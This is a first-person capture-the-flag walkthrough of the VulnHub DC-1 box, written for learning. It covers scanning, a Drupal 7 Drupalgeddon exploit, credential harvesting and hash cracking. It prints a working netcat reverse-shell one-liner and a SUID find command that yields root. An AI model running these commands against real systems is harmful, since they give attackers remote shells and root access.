DC-1 — VulnHub
Introduction:
DC series is a boot2root series on vulnhub that teaches many new skills. This is the first box in the series. First we start off by running nmap which reveals two 4 ports. We get foothold by exploiting vulnerable version of drupal and escalate privileges by exploiting suid binary. I could have done the box in simple steps but i followed the author’s guided way.
Methodology:
First we run full tcp scan which reveals two ports then we run aggressive scan on those open ports.
$ nmap -A -p22,80,111,45405 -oA scans/openTCP 192.168.125.151PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 45405/tcp status
| 100024 1 46408/tcp6 status
| 100024 1 47855/udp status
|_ 100024 1 53557/udp6 status
45405/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see the apache version in nmap scan and http generator header also tells that it’s drupal 7. Navigating to web, we get login panel. Tried some default creds but did not work.
Searching for vulnerabilities in drupal 7 reveals that it’s vulnerable to drupalgeddon (RCE) exploit. Found one on the github.
First time running the exploit gave error.
This can be solved by the following command:
sudo gem install highlineRunning the exploit successfully gave us shell. But it was a web shell. Anyway, got the first flag and gave hint to look at the config files.
Found the second flag and database credentials in the settings.phg file. Second flag gave hint to use db credentials.
So, i could not connect to db using the webshell so i got revershell through webshell using the following payload.
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Then connected to the database using the found credentials and got hashed credentials admin and another user.
So, i copied the hashes in my box and cracked them using hashcat. It took sometime to break them.
Then using the admin password i logged in drupal and found the third flag in the contents page.
The fourth flag was in the user’s home directory. Both third and fourth flag gave hint to look at the permissions of find binary. So, i listed the suid files and found that find has suid bit enabled.
Then, using the help from gtfobins, i used the following and successfully got root.
find . -exec /bin/sh \; -quit
